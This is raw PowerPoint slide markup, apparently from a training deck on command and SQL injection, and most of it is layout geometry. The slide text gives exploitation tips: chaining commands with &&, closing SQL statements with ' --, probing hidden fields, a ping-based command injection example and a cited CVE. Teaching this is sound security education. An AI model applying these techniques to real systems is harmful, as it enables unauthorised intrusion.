                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92355ED0-B60C-45D1-943A-58F05006DE24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372413" y="3183415"/>
            <a:ext cx="56989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Catch the request in Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CBFFE9A-308F-4DB1-8CAF-AF5214B4A7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7140417" y="934067"/>
            <a:ext cx="3218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Rename shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0401E49D-B70D-49C4-9475-D2E048DC7F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3339580" y="5861697"/>
            <a:ext cx="2623898"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B6A3291-4F71-4C2F-9C2B-C04A7C73C231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8988940" y="1956289"/>
            <a:ext cx="483051"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DE29032A-8ED9-4265-A7F4-5CA2870D6687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10857604" y="3849102"/>
            <a:ext cx="483051"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78378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E7632-0BD4-49DA-A83E-BB1A93BB3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4704ABEC-4F85-4A5E-B46A-48A8E64514E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3574974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2CE8F0-6D07-4093-AF32-4D3587DC2F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A39CDEA-8CD7-4096-AD78-269346B1BC45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0DC29D3-A156-457A-82D1-1533C14BAFE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="2170043"/>
            <a:ext cx="5996621" cy="3654287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developers often overlook untrusted input – leads to injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not just in web apps, either</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Primary cause: failure to escape meta characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows for chaining commands (&amp;&amp;) or closing SQL statements (' --)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A34A44AF-36BB-4C0C-BFB5-30E009FB1E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6901618" y="3140075"/>
            <a:ext cx="5019040" cy="577850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59D2EF33-19A4-414C-BA31-8A18D6C5ABAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8097044" y="3704673"/>
            <a:ext cx="2628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lack-Lato"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>CVE-2021-41316</a:t>
            </a:r>
            <a:endPar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4942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21FA9CA-87C6-4B5A-97FF-267ECA31519A}"/>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D82FB114-C862-4DCF-AA14-7351A74B8694}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>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D755DC36-731D-417F-B99A-BFE328198475}"/>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04D26B8-06ED-488A-B2D0-CE71ABD8A8CA}"/>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2CD9405F-2643-4C7F-AD5E-DC80FDFAFD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4AD768F-FEA1-4BFD-9245-907D3D3561F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tips for Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{959F872D-5ADE-4CFF-AD1B-D6FD040FC6CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="7705932" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know your meta characters and target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command chaining</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escapes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read error messages carefully</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Likely give indications as to what the original command syntax is and how to craft a new one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can you enter something into a field? Try it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is there a hidden element that gets sent with the request? Try that, too</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2776795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913D8D-52DA-42C9-B5D1-25E771089E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B72D3B1-41C5-45D3-955C-840C61DA9A9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic Command Injection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38DC6C1F-EC80-47BF-89C8-A2E35335F1C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="731520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable site runs ‘ping’, allows for other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> commands via chaining</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A625A6A3-E3FD-4920-93F8-7BF34C948C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="23974"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2861397" y="1708699"/>
            <a:ext cx="6469205" cy="1742842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{655E5138-5D64-49EE-976E-BC1C27574941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="75808"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2976127" y="3600601"/>
            <a:ext cx="6239746" cy="1368911"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6239746"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1368911"/>
              <a:gd name="connsiteX1" fmla="*/ 6239746 w 6239746"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1368911"/>
              <a:gd name="connsiteX2" fmla="*/ 6239746 w 6239746"/>
              <a:gd name="connsiteY2" fmla="*/ 1221238 h 1368911"/>
              <a:gd name="connsiteX3" fmla="*/ 6068482 w 6239746"/>
              <a:gd name="connsiteY3" fmla="*/ 1329209 h 1368911"/>
              <a:gd name="connsiteX4" fmla="*/ 6138056 w 6239746"/>
              <a:gd name="connsiteY4" fmla="*/ 1040974 h 1368911"/>
              <a:gd name="connsiteX5" fmla="*/ 5869699 w 6239746"/>
              <a:gd name="connsiteY5" fmla="*/ 1309330 h 1368911"/>
              <a:gd name="connsiteX6" fmla="*/ 5790186 w 6239746"/>
              <a:gd name="connsiteY6" fmla="*/ 1090670 h 1368911"/>
              <a:gd name="connsiteX7" fmla="*/ 5541708 w 6239746"/>
              <a:gd name="connsiteY7" fmla="*/ 1269574 h 1368911"/>
              <a:gd name="connsiteX8" fmla="*/ 5521830 w 6239746"/>
              <a:gd name="connsiteY8" fmla="*/ 1001217 h 1368911"/>
              <a:gd name="connsiteX9" fmla="*/ 5124264 w 6239746"/>
              <a:gd name="connsiteY9" fmla="*/ 1309330 h 1368911"/>
              <a:gd name="connsiteX10" fmla="*/ 5134203 w 6239746"/>
              <a:gd name="connsiteY10" fmla="*/ 1080730 h 1368911"/>
              <a:gd name="connsiteX11" fmla="*/ 5064630 w 6239746"/>
              <a:gd name="connsiteY11" fmla="*/ 1120487 h 1368911"/>
              <a:gd name="connsiteX12" fmla="*/ 4855908 w 6239746"/>
              <a:gd name="connsiteY12" fmla="*/ 1259635 h 1368911"/>
              <a:gd name="connsiteX13" fmla="*/ 4766456 w 6239746"/>
              <a:gd name="connsiteY13" fmla="*/ 1190061 h 1368911"/>
              <a:gd name="connsiteX14" fmla="*/ 4696882 w 6239746"/>
              <a:gd name="connsiteY14" fmla="*/ 1279513 h 1368911"/>
              <a:gd name="connsiteX15" fmla="*/ 4816151 w 6239746"/>
              <a:gd name="connsiteY15" fmla="*/ 812374 h 1368911"/>
              <a:gd name="connsiteX16" fmla="*/ 4349012 w 6239746"/>
              <a:gd name="connsiteY16" fmla="*/ 1279513 h 1368911"/>
              <a:gd name="connsiteX17" fmla="*/ 4329134 w 6239746"/>
              <a:gd name="connsiteY17" fmla="*/ 1120487 h 1368911"/>
              <a:gd name="connsiteX18" fmla="*/ 4170108 w 6239746"/>
              <a:gd name="connsiteY18" fmla="*/ 1239757 h 1368911"/>
              <a:gd name="connsiteX19" fmla="*/ 4150230 w 6239746"/>
              <a:gd name="connsiteY19" fmla="*/ 872009 h 1368911"/>
              <a:gd name="connsiteX20" fmla="*/ 3871934 w 6239746"/>
              <a:gd name="connsiteY20" fmla="*/ 1160244 h 1368911"/>
              <a:gd name="connsiteX21" fmla="*/ 3861995 w 6239746"/>
              <a:gd name="connsiteY21" fmla="*/ 971400 h 1368911"/>
              <a:gd name="connsiteX22" fmla="*/ 3683090 w 6239746"/>
              <a:gd name="connsiteY22" fmla="*/ 1110548 h 1368911"/>
              <a:gd name="connsiteX23" fmla="*/ 3712908 w 6239746"/>
              <a:gd name="connsiteY23" fmla="*/ 881948 h 1368911"/>
              <a:gd name="connsiteX24" fmla="*/ 3394856 w 6239746"/>
              <a:gd name="connsiteY24" fmla="*/ 1249696 h 1368911"/>
              <a:gd name="connsiteX25" fmla="*/ 3355099 w 6239746"/>
              <a:gd name="connsiteY25" fmla="*/ 1110548 h 1368911"/>
              <a:gd name="connsiteX26" fmla="*/ 3265647 w 6239746"/>
              <a:gd name="connsiteY26" fmla="*/ 1309330 h 1368911"/>
              <a:gd name="connsiteX27" fmla="*/ 3225890 w 6239746"/>
              <a:gd name="connsiteY27" fmla="*/ 842191 h 1368911"/>
              <a:gd name="connsiteX28" fmla="*/ 2689232 w 6239746"/>
              <a:gd name="connsiteY28" fmla="*/ 1368911 h 1368911"/>
              <a:gd name="connsiteX29" fmla="*/ 2689164 w 6239746"/>
              <a:gd name="connsiteY29" fmla="*/ 1368911 h 1368911"/>
              <a:gd name="connsiteX30" fmla="*/ 2639482 w 6239746"/>
              <a:gd name="connsiteY30" fmla="*/ 1160244 h 1368911"/>
              <a:gd name="connsiteX31" fmla="*/ 2381064 w 6239746"/>
              <a:gd name="connsiteY31" fmla="*/ 1359026 h 1368911"/>
              <a:gd name="connsiteX32" fmla="*/ 2291612 w 6239746"/>
              <a:gd name="connsiteY32" fmla="*/ 941583 h 1368911"/>
              <a:gd name="connsiteX33" fmla="*/ 1735021 w 6239746"/>
              <a:gd name="connsiteY33" fmla="*/ 1359026 h 1368911"/>
              <a:gd name="connsiteX34" fmla="*/ 1695264 w 6239746"/>
              <a:gd name="connsiteY34" fmla="*/ 1130426 h 1368911"/>
              <a:gd name="connsiteX35" fmla="*/ 1446786 w 6239746"/>
              <a:gd name="connsiteY35" fmla="*/ 1239757 h 1368911"/>
              <a:gd name="connsiteX36" fmla="*/ 1367273 w 6239746"/>
              <a:gd name="connsiteY36" fmla="*/ 1021096 h 1368911"/>
              <a:gd name="connsiteX37" fmla="*/ 1098916 w 6239746"/>
              <a:gd name="connsiteY37" fmla="*/ 1259635 h 1368911"/>
              <a:gd name="connsiteX38" fmla="*/ 1138673 w 6239746"/>
              <a:gd name="connsiteY38" fmla="*/ 951522 h 1368911"/>
              <a:gd name="connsiteX39" fmla="*/ 611899 w 6239746"/>
              <a:gd name="connsiteY39" fmla="*/ 1249696 h 1368911"/>
              <a:gd name="connsiteX40" fmla="*/ 671534 w 6239746"/>
              <a:gd name="connsiteY40" fmla="*/ 1040974 h 1368911"/>
              <a:gd name="connsiteX41" fmla="*/ 363421 w 6239746"/>
              <a:gd name="connsiteY41" fmla="*/ 1150304 h 1368911"/>
              <a:gd name="connsiteX42" fmla="*/ 283908 w 6239746"/>
              <a:gd name="connsiteY42" fmla="*/ 921704 h 1368911"/>
              <a:gd name="connsiteX43" fmla="*/ 0 w 6239746"/>
              <a:gd name="connsiteY43" fmla="*/ 1302556 h 13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239746" h="1368911">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6239746" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6239746" y="1221238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6068482" y="1329209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6138056" y="1040974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5869699" y="1309330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5790186" y="1090670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5541708" y="1269574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5521830" y="1001217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5124264" y="1309330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5134203" y="1080730"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5134203" y="1042291"/>
                  <a:pt x="5136899" y="1068865"/>
                  <a:pt x="5064630" y="1120487"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4855908" y="1259635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4766456" y="1190061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4696882" y="1279513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4816151" y="812374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4349012" y="1279513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329134" y="1120487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4170108" y="1239757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4150230" y="872009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3871934" y="1160244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3861995" y="971400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3683090" y="1110548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3712908" y="881948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3394856" y="1249696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3355099" y="1110548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3265647" y="1309330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3225890" y="842191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2689232" y="1368911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2689164" y="1368911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2639482" y="1160244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381064" y="1359026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2291612" y="941583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1735021" y="1359026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695264" y="1130426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1446786" y="1239757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1367273" y="1021096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098916" y="1259635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1138673" y="951522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611899" y="1249696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671534" y="1040974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363421" y="1150304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283908" y="921704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1302556"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2007E98-11F9-4665-823A-CD43B60811FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="78895"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2986361" y="5180625"/>
            <a:ext cx="6239746" cy="1194250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 409527 w 6239746"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX1" fmla="*/ 515646 w 6239746"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX2" fmla="*/ 522152 w 6239746"/>
              <a:gd name="connsiteY2" fmla="*/ 305775 h 1194250"/>
              <a:gd name="connsiteX3" fmla="*/ 800448 w 6239746"/>
              <a:gd name="connsiteY3" fmla="*/ 37418 h 1194250"/>
              <a:gd name="connsiteX4" fmla="*/ 840204 w 6239746"/>
              <a:gd name="connsiteY4" fmla="*/ 246140 h 1194250"/>
              <a:gd name="connsiteX5" fmla="*/ 1061731 w 6239746"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX6" fmla="*/ 1129375 w 6239746"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX7" fmla="*/ 1227830 w 6239746"/>
              <a:gd name="connsiteY7" fmla="*/ 246140 h 1194250"/>
              <a:gd name="connsiteX8" fmla="*/ 1297404 w 6239746"/>
              <a:gd name="connsiteY8" fmla="*/ 415105 h 1194250"/>
              <a:gd name="connsiteX9" fmla="*/ 1585639 w 6239746"/>
              <a:gd name="connsiteY9" fmla="*/ 186505 h 1194250"/>
              <a:gd name="connsiteX10" fmla="*/ 1615456 w 6239746"/>
              <a:gd name="connsiteY10" fmla="*/ 405166 h 1194250"/>
              <a:gd name="connsiteX11" fmla="*/ 1883813 w 6239746"/>
              <a:gd name="connsiteY11" fmla="*/ 136810 h 1194250"/>
              <a:gd name="connsiteX12" fmla="*/ 2132291 w 6239746"/>
              <a:gd name="connsiteY12" fmla="*/ 226262 h 1194250"/>
              <a:gd name="connsiteX13" fmla="*/ 2292560 w 6239746"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX14" fmla="*/ 2304220 w 6239746"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX15" fmla="*/ 2370830 w 6239746"/>
              <a:gd name="connsiteY15" fmla="*/ 275958 h 1194250"/>
              <a:gd name="connsiteX16" fmla="*/ 2559674 w 6239746"/>
              <a:gd name="connsiteY16" fmla="*/ 186505 h 1194250"/>
              <a:gd name="connsiteX17" fmla="*/ 2579552 w 6239746"/>
              <a:gd name="connsiteY17" fmla="*/ 474740 h 1194250"/>
              <a:gd name="connsiteX18" fmla="*/ 2589491 w 6239746"/>
              <a:gd name="connsiteY18" fmla="*/ 584071 h 1194250"/>
              <a:gd name="connsiteX19" fmla="*/ 2629248 w 6239746"/>
              <a:gd name="connsiteY19" fmla="*/ 623827 h 1194250"/>
              <a:gd name="connsiteX20" fmla="*/ 2957239 w 6239746"/>
              <a:gd name="connsiteY20" fmla="*/ 126871 h 1194250"/>
              <a:gd name="connsiteX21" fmla="*/ 2937361 w 6239746"/>
              <a:gd name="connsiteY21" fmla="*/ 395227 h 1194250"/>
              <a:gd name="connsiteX22" fmla="*/ 3193097 w 6239746"/>
              <a:gd name="connsiteY22" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX23" fmla="*/ 3271733 w 6239746"/>
              <a:gd name="connsiteY23" fmla="*/ 0 h 1194250"/>
              <a:gd name="connsiteX24" fmla="*/ 3285230 w 6239746"/>
              <a:gd name="connsiteY24" fmla="*/ 236201 h 1194250"/>
              <a:gd name="connsiteX25" fmla="*/ 3543648 w 6239746"/>
              <a:gd name="connsiteY25" fmla="*/ 126871 h 1194250"/>
